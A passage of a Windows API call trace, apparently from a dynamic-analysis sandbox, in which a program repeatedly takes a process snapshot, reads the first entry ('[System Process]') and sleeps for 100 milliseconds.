CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x830 [0266.941] Process32FirstW (in: hSnapshot=0x830, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0266.946] Sleep (dwMilliseconds=0x64) [0267.055] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x834 [0267.057] Process32FirstW (in: hSnapshot=0x834, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0267.064] Sleep (dwMilliseconds=0x64) [0267.165] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x838 [0267.166] Process32FirstW (in: hSnapshot=0x838, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0267.172] Sleep (dwMilliseconds=0x64) [0267.274] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x83c [0267.275] Process32FirstW (in: hSnapshot=0x83c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0267.281] Sleep (dwMilliseconds=0x64) [0267.383] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x840 [0267.384] Process32FirstW (in: hSnapshot=0x840, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0267.390] Sleep (dwMilliseconds=0x64) [0267.493] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x844 [0267.494] Process32FirstW (in: hSnapshot=0x844, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0267.501] Sleep (dwMilliseconds=0x64) [0267.618] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x848 [0267.625] Process32FirstW (in: hSnapshot=0x848, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0267.632] Sleep (dwMilliseconds=0x64) [0267.726] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x84c [0267.728] Process32FirstW (in: hSnapshot=0x84c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0267.733] Sleep (dwMilliseconds=0x64) [0267.835] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x850 [0267.837] Process32FirstW (in: hSnapshot=0x850, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0267.842] Sleep (dwMilliseconds=0x64) [0267.945] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x854 [0267.946] Process32FirstW (in: hSnapshot=0x854, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0267.952] Sleep (dwMilliseconds=0x64) [0268.054] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x858 [0268.055] Process32FirstW (in: hSnapshot=0x858, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0268.061] Sleep (dwMilliseconds=0x64) [0268.163] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x85c [0268.165] Process32FirstW (in: hSnapshot=0x85c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0268.171] Sleep (dwMilliseconds=0x64) [0268.272] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x860 [0268.274] Process32FirstW (in: hSnapshot=0x860, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0268.279] Sleep (dwMilliseconds=0x64) [0268.382] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x864 [0268.383] Process32FirstW (in: hSnapshot=0x864, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0268.389] Sleep (dwMilliseconds=0x64) [0268.491] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x868 [0268.493] Process32FirstW (in: hSnapshot=0x868, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0268.498] Sleep (dwMilliseconds=0x64) [0268.600] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x86c [0268.601] Process32FirstW (in: hSnapshot=0x86c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0268.607] Sleep (dwMilliseconds=0x64) [0268.709] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x870 [0268.711] Process32FirstW (in: hSnapshot=0x870, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0268.716] Sleep (dwMilliseconds=0x64) [0268.818] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x874 [0268.820] Process32FirstW (in: hSnapshot=0x874, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0268.825] Sleep (dwMilliseconds=0x64) [0268.929] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x878 [0268.930] Process32FirstW (in: hSnapshot=0x878, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0268.936] Sleep (dwMilliseconds=0x64) [0269.037] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x87c [0269.038] Process32FirstW (in: hSnapshot=0x87c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0269.045] Sleep (dwMilliseconds=0x64) [0269.146] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x880 [0269.148] Process32FirstW (in: hSnapshot=0x880, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0269.154] Sleep (dwMilliseconds=0x64) [0269.255] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x884 [0269.257] Process32FirstW (in: hSnapshot=0x884, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0269.264] Sleep (dwMilliseconds=0x64) [0269.365] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x888 [0269.366] Process32FirstW (in: hSnapshot=0x888, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0269.373] Sleep (dwMilliseconds=0x64) [0269.473] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x88c [0269.475] Process32FirstW (in: hSnapshot=0x88c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0269.482] Sleep (dwMilliseconds=0x64) [0269.582] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x890 [0269.584] Process32FirstW (in: hSnapshot=0x890, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0269.589] Sleep (dwMilliseconds=0x64) [0269.692] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x894 [0269.693] Process32FirstW (in: hSnapshot=0x894, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0269.699] Sleep (dwMilliseconds=0x64) [0269.801] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x898 [0269.802] Process32FirstW (in: hSnapshot=0x898, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0269.808] Sleep (dwMilliseconds=0x64) [0269.910] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x89c [0269.912] Process32FirstW (in: hSnapshot=0x89c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0269.917] Sleep (dwMilliseconds=0x64) [0270.019] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x8a0 [0270.021] Process32FirstW (in: hSnapshot=0x8a0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0270.026] Sleep (dwMilliseconds=0x64) [0270.128] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x8a4 [0270.130] Process32FirstW (in: hSnapshot=0x8a4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0270.136] Sleep (dwMilliseconds=0x64) [0270.238] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x8a8 [0270.239] Process32FirstW (in: hSnapshot=0x8a8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0270.245] Sleep (dwMilliseconds=0x64) [0270.347] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x8ac [0270.348] Process32FirstW (in: hSnapshot=0x8ac, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0270.354] Sleep (dwMilliseconds=0x64) [0270.456] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x8b0 [0270.458] Process32FirstW (in: hSnapshot=0x8b0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0270.463] Sleep (dwMilliseconds=0x64) [0270.565] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x8b4 [0270.567] Process32FirstW (in: hSnapshot=0x8b4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0270.572] Sleep (dwMilliseconds=0x64) [0270.675] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x8b8 [0270.676] Process32FirstW (in: hSnapshot=0x8b8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0270.682] Sleep (dwMilliseconds=0x64) [0270.784] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x8bc [0270.785] Process32FirstW (in: hSnapshot=0x8bc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0270.791] Sleep (dwMilliseconds=0x64) [0270.893] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x8c0 [0270.894] Process32FirstW (in: hSnapshot=0x8c0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0270.900] Sleep (dwMilliseconds=0x64) [0271.002] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x8c4 [0271.004] Process32FirstW (in: hSnapshot=0x8c4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0271.009] Sleep (dwMilliseconds=0x64) [0271.112] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x8c8 [0271.113] Process32FirstW (in: hSnapshot=0x8c8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0271.118] Sleep (dwMilliseconds=0x64) [0271.220] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x8cc [0271.222] Process32FirstW (in: hSnapshot=0x8cc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0271.227] Sleep (dwMilliseconds=0x64) [0271.330] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x8d0 [0271.331] Process32FirstW (in: hSnapshot=0x8d0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0271.336] Sleep (dwMilliseconds=0x64) [0271.439] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x8d4 [0271.441] Process32FirstW (in: hSnapshot=0x8d4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0271.446] Sleep (dwMilliseconds=0x64) [0271.548] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x8d8 [0271.549] Process32FirstW (in: hSnapshot=0x8d8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0271.555] Sleep (dwMilliseconds=0x64) [0271.659] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x8dc [0271.663] Process32FirstW (in: hSnapshot=0x8dc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0271.669] Sleep (dwMilliseconds=0x64) [0271.767] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x8e0 [0271.768] Process32FirstW (in: hSnapshot=0x8e0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0271.774] Sleep (dwMilliseconds=0x64) [0271.876] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x8e4 [0271.877] Process32FirstW (in: hSnapshot=0x8e4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0271.883] Sleep (dwMilliseconds=0x64) [0271.985] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x8e8 [0271.987] Process32FirstW (in: hSnapshot=0x8e8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0271.992] Sleep (dwMilliseconds=0x64) [0272.095] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x8ec [0272.096] Process32FirstW (in: hSnapshot=0x8ec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0272.102] Sleep (dwMilliseconds=0x64) [0272.203] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x8f0 [0272.205] Process32FirstW (in: hSnapshot=0x8f0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0272.211] Sleep (dwMilliseconds=0x64) [0272.312] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x8f4 [0272.314] Process32FirstW (in: hSnapshot=0x8f4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0272.319] Sleep (dwMilliseconds=0x64) [0272.424] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x8f8 [0272.425] Process32FirstW (in: hSnapshot=0x8f8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0272.431] Sleep (dwMilliseconds=0x64) [0272.531] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x8fc [0272.533] Process32FirstW (in: hSnapshot=0x8fc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0272.538] Sleep (dwMilliseconds=0x64) [0272.640] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x900 [0272.641] Process32FirstW (in: hSnapshot=0x900, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0272.647] Sleep (dwMilliseconds=0x64) [0272.750] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x904 [0272.751] Process32FirstW (in: hSnapshot=0x904, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0272.757] Sleep (dwMilliseconds=0x64) [0272.861] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x908 [0272.862] Process32FirstW (in: hSnapshot=0x908, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0272.868] Sleep (dwMilliseconds=0x64) [0272.968] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x90c [0272.969] Process32FirstW (in: hSnapshot=0x90c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0272.975] Sleep (dwMilliseconds=0x64) [0273.078] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x910 [0273.080] Process32FirstW (in: hSnapshot=0x910, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0273.085] Sleep (dwMilliseconds=0x64) [0273.186] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x914 [0273.188] Process32FirstW (in: hSnapshot=0x914, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0273.193] Sleep (dwMilliseconds=0x64) [0273.304] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x918 [0273.305] Process32FirstW (in: hSnapshot=0x918, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0273.311] Sleep (dwMilliseconds=0x64) [0273.420] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x91c [0273.422] Process32FirstW (in: hSnapshot=0x91c, lppe=0x18ebc4 | out: 